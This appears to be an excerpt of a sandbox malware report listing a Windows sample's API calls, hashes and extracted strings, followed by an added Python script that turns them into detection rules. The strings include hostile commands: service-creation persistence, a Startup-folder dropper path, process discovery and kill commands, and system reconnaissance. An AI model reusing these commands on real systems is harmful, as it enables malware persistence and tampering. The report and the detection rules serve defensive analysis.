                                      • API ID: Crypt$ContextErrorExceptionException@8LastRaiseRandomReleaseThrow
                                      • String ID: CryptGenRandom
                                      • API String ID: 1600773198-3616286655
                                      • Opcode ID: 6b572952fcda7a0ecd32e76a16e4515d55abd7037d64bbfb7c0ffe416e386641
                                      • Instruction ID: fbf995f01fe08ba4908ebd3ffbe84443b2c957f673a1ca536b462ce1b4c2be4c
                                      • Opcode Fuzzy Hash: 6b572952fcda7a0ecd32e76a16e4515d55abd7037d64bbfb7c0ffe416e386641
                                      • Instruction Fuzzy Hash: CC319EB1A0424CEFDF11DFA4D845BEEBBB8EF45314F100129E815AB281DB709A08CB61
                                      APIs
                                      • PathIsNetworkPathA.SHLWAPI(?,009AAB14,?,?,?,BA3649C5), ref: 008C6167
                                      • __alloca_probe_16.LIBCMT ref: 008C6197
                                      • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,?,?,?,?,?,BA3649C5), ref: 008C61B1
                                      • GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,BA3649C5), ref: 008C61CC
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Path$ByteCharDiskFreeMultiNetworkSpaceWide__alloca_probe_16
                                      • String ID:
                                      • API String ID: 592574438-0
                                      • Opcode ID: 382f2657ddcfb682acafe525cb464102ea91adb0aa1a8dc6e037981e0a1960e6
                                      • Instruction ID: bcd15c254778f11d99f84a8578766e1376a1a0fadf1d2f4b59c0ce51759ec8ae
                                      • Opcode Fuzzy Hash: 382f2657ddcfb682acafe525cb464102ea91adb0aa1a8dc6e037981e0a1960e6
                                      • Instruction Fuzzy Hash: 10519D31A042199FDB14CFA8C881FAEB7B9FF85310F18822EE801D7291E731ED558B60
                                      APIs
                                      • GetUserNameW.ADVAPI32(?,?), ref: 008C3EF3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: NameUser
                                      • String ID: engineer
                                      • API String ID: 2645101109-2484562649
                                      • Opcode ID: bac71a43460cbc3b9187df7e819a68a8d48490679b3188bc625b8ca01375e53c
                                      • Instruction ID: cca6ee5cf4f3b0ba33a77455afdf6b881222ee18537074339f66193d95c5ffa5
                                      • Opcode Fuzzy Hash: bac71a43460cbc3b9187df7e819a68a8d48490679b3188bc625b8ca01375e53c
                                      • Instruction Fuzzy Hash: 91418C7195011CABCB24DB68DC98BDEB7B5FB48310F6042D9E009A7290DB38ABC4CF90
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3916222277
                                      • Opcode ID: 6bbf8f2b8c2657e4eb3a4b76697824776381fbd7f8aeba6fc0a65bdc62c6d286
                                      • Instruction ID: 536c8df6c3aec22e6fb8afcaae2cbc60e3cac08c96280acfb481885dcfd4ae7d
                                      • Opcode Fuzzy Hash: 6bbf8f2b8c2657e4eb3a4b76697824776381fbd7f8aeba6fc0a65bdc62c6d286
                                      • Instruction Fuzzy Hash: D5A26974A14118DFCB18CF98D4A0ABDB7F1FB49310F21448EE596AB392C635AE91EF50
                                      APIs
                                      • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0091507A
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: ContextCryptRelease
                                      • String ID:
                                      • API String ID: 829835001-0
                                      • Opcode ID: 069e78711299a6452f6ddc996f2261258309ff6267bc8c6057729f458811478d
                                      • Instruction ID: 205db3bff3f7d917d97b9f5927275db8a82f4e55bf0fa4c3e51b35db4ce0671e
                                      • Opcode Fuzzy Hash: 069e78711299a6452f6ddc996f2261258309ff6267bc8c6057729f458811478d
                                      • Instruction Fuzzy Hash: 5B21D371B5D614DBD720DF98DC01F9AB3A8E7C8B90F06026AE80997390F7719880C691

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                       control_flow_graph: function entry 8dca4c (the rendered graph's edge list is not reproduced here; the block labels recovered from it are listed below)
                                       • 8dcbcd-8dcbec: SetErrorMode, SetConsoleTitleW, call 8c60a0
                                       • 8dcce0-8dd022: call 8c3030, GetModuleFileNameW, CopyFileW (two calls), call 8d45a0, call 8c38c0
                                       • 8dd4d4-8dd4db: Sleep, looping back to 8dd4b0-8dd4cb
                                       • 8ded55-8ded72: call 940dbb (reached from 8dcbcd-8dcbec and from 8dec74-8ded50)
                                      APIs
                                      • SetErrorMode.KERNEL32(00000001), ref: 008DCBCF
                                      • SetConsoleTitleW.KERNEL32(asykat), ref: 008DCBDA
                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000400,dcdcf,00000000), ref: 008DCCF3
                                      • CopyFileW.KERNEL32(00000000,00000000,00000000,00989F4D,000000FF), ref: 008DCDB3
                                      • CopyFileW.KERNEL32(00000000,00000000,00000000), ref: 008DCE2D
                                        • Part of subcall function 008D45A0: GetCurrentThread.KERNEL32 ref: 008D45E3
                                        • Part of subcall function 008D45A0: OpenThreadToken.ADVAPI32(00000000), ref: 008D45EA
                                        • Part of subcall function 008D45A0: GetLastError.KERNEL32 ref: 008D45F4
                                        • Part of subcall function 008D45A0: GetCurrentProcess.KERNEL32(0000000A,?), ref: 008D460B
                                        • Part of subcall function 008D45A0: OpenProcessToken.ADVAPI32(00000000), ref: 008D4612
                                        • Part of subcall function 008D45A0: DuplicateToken.ADVAPI32(?,00000002,?), ref: 008D4629
                                        • Part of subcall function 008D45A0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 008D4654
                                        • Part of subcall function 008D45A0: LocalAlloc.KERNEL32(00000040,00000014), ref: 008D4666
                                        • Part of subcall function 008D45A0: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 008D467A
                                        • Part of subcall function 008D45A0: GetLengthSid.ADVAPI32(?), ref: 008D468B
                                        • Part of subcall function 008D45A0: LocalAlloc.KERNEL32(00000040,00000010), ref: 008D4697
                                        • Part of subcall function 008D45A0: InitializeAcl.ADVAPI32(00000000,00000010,00000002), ref: 008D46AC
                                        • Part of subcall function 008D45A0: AddAccessAllowedAce.ADVAPI32(?,00000002,00000003,?), ref: 008D46C4
                                        • Part of subcall function 008D45A0: SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,?,00000000), ref: 008D46DC
                                        • Part of subcall function 008C6550: GlobalMemoryStatusEx.KERNEL32(BA3649C5), ref: 008C656F
                                        • Part of subcall function 008C4CC0: NetUserEnum.NETAPI32(00000000,00000000,00000002,00000000,000000FF,00000000,?,?,BA3649C5), ref: 008C4D25
                                        • Part of subcall function 008C4CC0: NetApiBufferFree.NETAPI32(00000000), ref: 008C4DC6
                                        • Part of subcall function 008C4CC0: NetApiBufferFree.NETAPI32(00000000), ref: 008C4DE2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: FileInitializeToken$AllocBufferCopyCurrentDescriptorErrorFreeLocalOpenProcessSecurityThread$AccessAllocateAllowedConsoleDaclDuplicateEnumGlobalLastLengthMemoryModeModuleNameStatusTitleUser
                                      • String ID: /f$" start= auto$" start=auto$","$"cmd.exe","$$$$$.1UI$77H75$:\Documents and Settings\$:\Users\$Dflt$Fast$Fast$Manual_Mini_Config$Mini_Config$Version 5.$\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Xinfecter.exe$\AppData\SysMain.sys$\Start Menu\Programs\Startup\Xinfecter.exe$asykat$asykat$c:\R_cfg.ini$dcdcf$k2ba8v$r1d8la$sc create SqlBakup binPath= "$taskkill /PID $tasklist /v /fo csv | findstr /i "dcdcf"$ver
                                      • API String ID: 2029459818-482096149
                                      • Opcode ID: a2a012f65daf249f4f57b12fdc2aa6ad96378fccf6dfcc5ab83aed7c25d5c888
                                      • Instruction ID: 4dadac689781585f4bfb1d84209d326eb9f75381c1fa1b736212b0d916da5694
                                      • Opcode Fuzzy Hash: a2a012f65daf249f4f57b12fdc2aa6ad96378fccf6dfcc5ab83aed7c25d5c888
                                      • Instruction Fuzzy Hash: 8F22D6309012589ACB24EB68CC56BEDB7B4FF56304F0041E9E409E7292EB705F89CB53
                                      APIs
                                        • Part of subcall function 008C60E0: PathIsNetworkPathA.SHLWAPI(?,009AAB14,?,?,?,BA3649C5), ref: 008C6167
                                        • Part of subcall function 008C60E0: __alloca_probe_16.LIBCMT ref: 008C6197
                                        • Part of subcall function 008C60E0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,?,?,?,?,?,BA3649C5), ref: 008C61B1
                                        • Part of subcall function 008C60E0: GetDiskFreeSpaceExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,BA3649C5), ref: 008C61CC
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008D24F7
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008D2505
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008D2539
                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 008D2547
                                        • Part of subcall function 008C4080: GetComputerNameExW.KERNEL32(00000000,?,?,BA3649C5,?), ref: 008C4101
                                        • Part of subcall function 008C4080: DsRoleGetPrimaryDomainInformation.NETAPI32(00000000,00000001,?,?,00000000,?,?,?), ref: 008C41A0
                                        • Part of subcall function 008BAE70: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 008BAEE1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$Path$ByteCharComputerDiskDomainFreeInformationIos_base_dtorMultiNameNetworkPrimaryRoleSpaceWide__alloca_probe_16std::ios_base::_
                                      • String ID: | $ ~$,d5$77H75$77H75$:\Users\$Microsoft$\AppData\S-inf.sys$_And_Netword_Drive_Size:$_Encryption_Mode:$_Fast_Mode$_Slow_Mode$___$api.ipify.org$echo %date%-%time%$f$hg3l,$n7t0$o8g9n$p2h6$s4e5y$systeminfo|find /i "original"$systeminfo|find /i "os name"$ver
                                      • API String ID: 586396178-4214318300
                                      • Opcode ID: 992a9bc938fa2062cf546e90385e4a994903bed7a03b9af6ea5cde02a92ada1b
                                      • Instruction ID: d7c6f4c6e7bb24c0ff8f6a2450c8447cff5da76d7b5a1bad5128919a7b3bac60
                                      • Opcode Fuzzy Hash: 992a9bc938fa2062cf546e90385e4a994903bed7a03b9af6ea5cde02a92ada1b
                                      • Instruction Fuzzy Hash: E9139E70D102988BEB24DB28CD55BEDBBB5FF91304F5082D9D048A7292DB755B88CF92
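                                       Added example (not part of the Joe Sandbox report and not code from the sample): a small Python hunt that turns the persistence, discovery and drop-path strings listed in the two function records above (the `sc create SqlBakup binPath= "..." start= auto` service command, `tasklist /v /fo csv | findstr /i "dcdcf"`, `taskkill /PID`, `systeminfo|find /i "os name"` / `"original"`, the `api.ipify.org` lookup, and the `...\Start Menu\Programs\Startup\Xinfecter.exe`, `\AppData\SysMain.sys`, `\AppData\S-inf.sys` and `c:\R_cfg.ini` drop locations) into rules and runs them over a handful of event records. The event layout (`type`, `pid`, `cmdline`, `target`, `query`) is an assumption loosely modelled on Sysmon process-create, file-create and DNS fields, and every sample event is constructed for this example; neither comes from the report.

```python
"""Hunt rules built from the RCRU64 indicator strings in the report.

Added example: the indicator strings are copied from the report's
String ID lists; the event layout and SAMPLE_EVENTS below are
constructed for this example and are not real telemetry.
"""
import re
from typing import Dict, List

# Command lines the sample assembles (from the String ID lists above).
COMMAND_RULES = {
    # sc create SqlBakup binPath= "<path>" start= auto   (also "start=auto")
    "service_persistence": re.compile(
        r'\bsc(?:\.exe)?\s+create\s+SqlBakup\s+binPath=\s*".*?"\s+start=\s*auto',
        re.IGNORECASE),
    # tasklist /v /fo csv | findstr /i "dcdcf"
    "process_discovery": re.compile(
        r'\btasklist\s+/v\s+/fo\s+csv\s*\|\s*findstr\s+/i\s+"dcdcf"',
        re.IGNORECASE),
    # taskkill /PID <pid>
    "process_kill": re.compile(r"\btaskkill\s+/PID\s+\d+", re.IGNORECASE),
    # systeminfo|find /i "os name"  and  systeminfo|find /i "original"
    "host_recon": re.compile(
        r'\bsysteminfo\s*\|\s*find\s+/i\s+"(?:os name|original)"',
        re.IGNORECASE),
}

# Drop locations from the same lists. Matched as lower-case path suffixes so the
# profile root (:\Users\ or :\Documents and Settings\, both in the report) does
# not matter.
DROP_PATH_SUFFIXES = (
    r"\start menu\programs\startup\xinfecter.exe",
    r"\appdata\sysmain.sys",
    r"\appdata\s-inf.sys",
    r"c:\r_cfg.ini",
)

# External-IP lookup host from the second function record.
IP_LOOKUP_HOSTS = {"api.ipify.org"}


def classify_command(cmdline: str) -> List[str]:
    """Names of every command rule that matches the command line."""
    return [name for name, rx in COMMAND_RULES.items() if rx.search(cmdline)]


def is_drop_path(path: str) -> bool:
    """True if the path ends with one of the sample's drop locations."""
    normalised = path.lower().replace("/", "\\")
    return any(normalised.endswith(suffix) for suffix in DROP_PATH_SUFFIXES)


def scan_events(events: List[Dict]) -> List[Dict]:
    """Run all rules over a list of event records and return the hits in order."""
    hits = []
    for ev in events:
        kind = ev["type"]
        if kind == "ProcessCreate":
            for rule in classify_command(ev["cmdline"]):
                hits.append({"rule": rule, "pid": ev["pid"], "detail": ev["cmdline"]})
        elif kind == "FileCreate" and is_drop_path(ev["target"]):
            hits.append({"rule": "dropped_artifact", "pid": ev["pid"], "detail": ev["target"]})
        elif kind == "DnsQuery" and ev["query"].lower() in IP_LOOKUP_HOSTS:
            hits.append({"rule": "external_ip_lookup", "pid": ev["pid"], "detail": ev["query"]})
    return hits


# Constructed events (not from the report); the user profile name is made up.
SAMPLE_EVENTS = [
    {"type": "ProcessCreate", "pid": 4120,
     "cmdline": 'cmd.exe /c sc create SqlBakup binPath= "C:\\Users\\victim\\AppData\\SysMain.sys" start= auto'},
    {"type": "ProcessCreate", "pid": 4124,
     "cmdline": 'cmd.exe /c tasklist /v /fo csv | findstr /i "dcdcf"'},
    {"type": "ProcessCreate", "pid": 4130, "cmdline": "taskkill /PID 3388"},
    {"type": "ProcessCreate", "pid": 4136,
     "cmdline": 'cmd.exe /c systeminfo|find /i "os name"'},
    {"type": "FileCreate", "pid": 4100,
     "target": "C:\\Users\\victim\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Xinfecter.exe"},
    {"type": "FileCreate", "pid": 4100, "target": "C:\\Users\\victim\\AppData\\S-inf.sys"},
    {"type": "DnsQuery", "pid": 4100, "query": "api.ipify.org"},
    # benign activity that must not fire
    {"type": "ProcessCreate", "pid": 4140, "cmdline": "notepad.exe C:\\Users\\victim\\notes.txt"},
    {"type": "FileCreate", "pid": 4140, "target": "C:\\Windows\\System32\\drivers\\SysMain.sys"},
]


if __name__ == "__main__":
    for hit in scan_events(SAMPLE_EVENTS):
        print(f'{hit["rule"]:22} pid={hit["pid"]:<6} {hit["detail"]}')
```

                                       The service rule requires the `SqlBakup` name together with `binPath=` and `start= auto`, so an administrator's ordinary `sc create` does not fire; the drop-path rule keys on the `\AppData\` parent so the legitimate `System32\drivers` copy of a similarly named driver is ignored.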

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                       control_flow_graph: function entry 9780dc (the rendered graph's edge list is not reproduced here; the block labels recovered from it are listed below)
                                       • 9780ea-9780fd: call 9661c3, call 965932
                                       • 97810e-978116: call 9661b0; 978118-97813d: call 982bd3
                                       • 97813f-978154 and 978190-9781ae: call 975565 (the _free references at 978142, 97814D, 978193, 97819E and 9781A9)
                                       • 9781c4-978215: call 9661b0, call 959190, CreateProcessA
                                       • 978217-978226: GetLastError, call 96618d (the __dosmaperr reference at 97821E), then CloseHandle at 978228-978229 and 978233-97823a
                                       • 97824c-978269: WaitForSingleObject, GetExitCodeProcess
                                       • 97826b-97826c, 978276-978277, 97828b-97828c, 978296-978297, 9782c7-9782c8: CloseHandle
                                       • 97829f-9782c1 and 9782ce-9782ee: call 975565 (the remaining _free references)
                                       • 9782fa-978301: call 9617a5
                                      APIs
                                        • Part of subcall function 00982BD3: _free.LIBCMT ref: 00982BF5
                                      • _free.LIBCMT ref: 0097814D
                                      • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000004,00000000,?,?,?,?,?,?,?,00000000), ref: 00978207
                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,00000000), ref: 00978217
                                      • __dosmaperr.LIBCMT ref: 0097821E
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00978229
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00978234
                                      • WaitForSingleObject.KERNEL32(?,00000000,?,?,?,?,?,00000000,00000000), ref: 0097824E
                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 0097825B
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0097826C
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00978277
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 0097828C
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 00978297
                                      • _free.LIBCMT ref: 009782A2
                                      • _free.LIBCMT ref: 009782AE
                                      • _free.LIBCMT ref: 009782BA
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,00000000), ref: 009782C8
                                      • _free.LIBCMT ref: 00978142
                                        • Part of subcall function 00975565: HeapFree.KERNEL32(00000000,00000000,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?), ref: 0097557B
                                        • Part of subcall function 00975565: GetLastError.KERNEL32(?,?,0097DDF8,?,00000000,?,00000000,?,0097E09C,?,00000007,?,?,0097E490,?,?), ref: 0097558D
                                      • _free.LIBCMT ref: 00978193
                                      • _free.LIBCMT ref: 0097819E
                                      • _free.LIBCMT ref: 009781A9
                                      • _free.LIBCMT ref: 009782D1
                                      • _free.LIBCMT ref: 009782DD
                                      • _free.LIBCMT ref: 009782E9
                                       Memory Dump Source
                                       • Source File: 00000001.00000002.3511706844.00000000008B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008B0000, based on PE: true
                                       • Associated: 00000001.00000002.3511680370.00000000008B0000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511916887.0000000000993000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3511973051.00000000009CF000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512007247.00000000009D1000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512056461.00000000009D6000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000001.00000002.3512096343.00000000009E0000.00000002.00000001.01000000.00000003.sdmp
                                       Joe Sandbox IDA Plugin
                                       • Snapshot File: hcaresult_1_2_8b0000_8AbMCL2dxM.jbxd
                                      Similarity
                                      • API ID: _free$CloseHandle$ErrorLastProcess$CodeCreateExitFreeHeapObjectSingleWait__dosmaperr
                                      • String ID:
                                      • API String ID: 4143445633-0
                                      • Opcode ID: 7144c3be9780338d0dbac16eedbe43eb6fd9ed01b5c49b23c8fbc779d5041ab7
                                      • Instruction ID: 7c5ae061877b669c7f909ac4a95c3789f50c827cbc3ccdfd59c1661b94ed63bf
                                      • Opcode Fuzzy Hash: 7144c3be9780338d0dbac16eedbe43eb6fd9ed01b5c49b23c8fbc779d5041ab7
                                      • Instruction Fuzzy Hash: D161BC72C44608EFDF11AFA4CC89AEEBB79EF44355F208526F828B2111DB314A44CB61

                                       Control-flow Graph
                                       • Graph of the function at 008C38C0 (basic blocks 008C38C0-008C3D47), rendered as an image in the report; the node and edge list is not reproduced. Windows APIs on the graph: GetFileAttributesW (three sites) and CreateDirectoryW (repeated, eleven sites), i.e. the function probes a path and creates the missing directory levels. Internal callees: 008EA350, 008E7430, 008E88E0, 0094143C, 00965942, 00940DBB.
                                      APIs
                                      • GetFileAttributesW.KERNEL32(?,AppData\,00000008,?,?,009AB058,00000001,?,?,?,?,00000000), ref: 008C3B77
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3B8D
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3B98
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3B9D
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3BA5
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3BAD
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3BB2
                                      • CreateDirectoryW.KERNEL32(?,00000000), ref: 008C3BBC
                                      Strings
                                      Similarity
                                      • API ID: CreateDirectory$AttributesFile
                                      • String ID: :\Users\$AppData\
                                      • API String ID: 689033430-659903382
                                      • Opcode ID: ecb9212ff88e597066b9fd740433c9d3e94a9af007453c4baf20bc13da0b1160
                                      • Instruction ID: ca7d6c7228cd3d2b0b4b5226cd669293f06e35a0ac41fb2ee30767f54ba6d8c7
                                      • Opcode Fuzzy Hash: ecb9212ff88e597066b9fd740433c9d3e94a9af007453c4baf20bc13da0b1160
                                      • Instruction Fuzzy Hash: 71D1D131A10258DBDB14DF68CC45FADBB72FF85314F20825DE409AB2A1D775AB86CB90

                                       Control-flow Graph
                                       • Graph of the function at 00965042 (basic blocks 00965042-00965284), rendered as an image in the report; the node and edge list is not reproduced. Windows APIs on the graph: GetCurrentProcess, DuplicateHandle, CloseHandle and CreateProcessA (block 009651CB-00965207; this call site does not appear in the APIs list below). Internal callees: 009760DD, 00977A3D, 0096549C, 009652DB, 00959190, 00975508, 009729C2, 009773E8, 00965319, 00975565, 009625BA, 0096595F.
                                      APIs
                                      • GetCurrentProcess.KERNEL32 ref: 0096504D
                                      • DuplicateHandle.KERNELBASE(00000000,?,00000000,000000FF,00000000,00000001,00000002), ref: 00965081
                                      • CloseHandle.KERNEL32(000000FF), ref: 00965269
                                        • Part of subcall function 0096595F: IsProcessorFeaturePresent.KERNEL32(00000017,00965931,?,?,008B1F07,?,?,00000016,?,?,0096593E,00000000,00000000,00000000,00000000,00000000), ref: 00965961
                                        • Part of subcall function 0096595F: GetCurrentProcess.KERNEL32(C0000417,?,?,?), ref: 00965983
                                        • Part of subcall function 0096595F: TerminateProcess.KERNEL32(00000000), ref: 0096598A
                                      Strings
                                      Similarity
                                      • API ID: Process$CurrentHandle$CloseDuplicateFeaturePresentProcessorTerminate
                                      • String ID: /c $D$cmd.exe
                                      • API String ID: 1167604731-1597775715
                                      • Opcode ID: 84cded117038e32bb57b64ac20debebe999927f0ecaa046104cc7fa6660148fb
                                      • Instruction ID: cc87ac5a30ba03870ef88b82338f6c63ea10d332aba85ba33ad043ba459eafde
                                      • Opcode Fuzzy Hash: 84cded117038e32bb57b64ac20debebe999927f0ecaa046104cc7fa6660148fb
                                      • Instruction Fuzzy Hash: 8171E572A04A09AFDF20CFB8CC45BAEBBB9EF85354F154129F818A7251D7719E01DB50

                                       Control-flow Graph
                                       • Graph of the function at 009792A2 (basic blocks 009792A2-00979656), rendered as an image in the report; the node and edge list is not reproduced. Windows APIs on the graph (this record has no APIs list, so they are taken from the graph only): ReadFile, GetConsoleMode, ReadConsoleW, GetLastError. Internal callees: 009661B0, 009661C3, 00965932, 00976393, 00975565, 009797F5, 00980447, 0096618D, 00978FBE, 0097910E, 00978DFE.
                                      Strings
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID: 0-3907804496
                                      • Opcode ID: 08e8f60fd4b11124f448c2947b02698b53abf7c86947dcf03a6e754cd281f98d
                                      • Instruction ID: 24fa56e93c4814aa3703a7605beaa9240db409bfdf2e2ed2cf8464395c8b4958
                                      • Opcode Fuzzy Hash: 08e8f60fd4b11124f448c2947b02698b53abf7c86947dcf03a6e754cd281f98d
                                      • Instruction Fuzzy Hash: 36C1E572D0825A9FDF12DFA8C845BADBBB8FF4A310F148185F918A7392C7359941CB60

                                       Control-flow Graph
                                       • Graph of the function at 00980E90 (basic blocks 00980E90-009811B8), rendered as an image in the report; the node and edge list is not reproduced. Windows APIs on the graph: GetFileType, GetLastError (three sites), CloseHandle (two sites); CreateFileW is reached through callee 00980B5E. Internal callees: 00980BF3, 0097D47E, 009661B0, 009661C3, 00980B5E, 0096618D, 0097D3C7, 00980911, 00980D6F, 0097615C, 0097D590.
                                      APIs
                                        • Part of subcall function 00980B5E: CreateFileW.KERNEL32(00000000,00000000,?,00980F39,?,?,00000000,?,00980F39,00000000,0000000C), ref: 00980B7B
                                      • GetLastError.KERNEL32 ref: 00980FA4
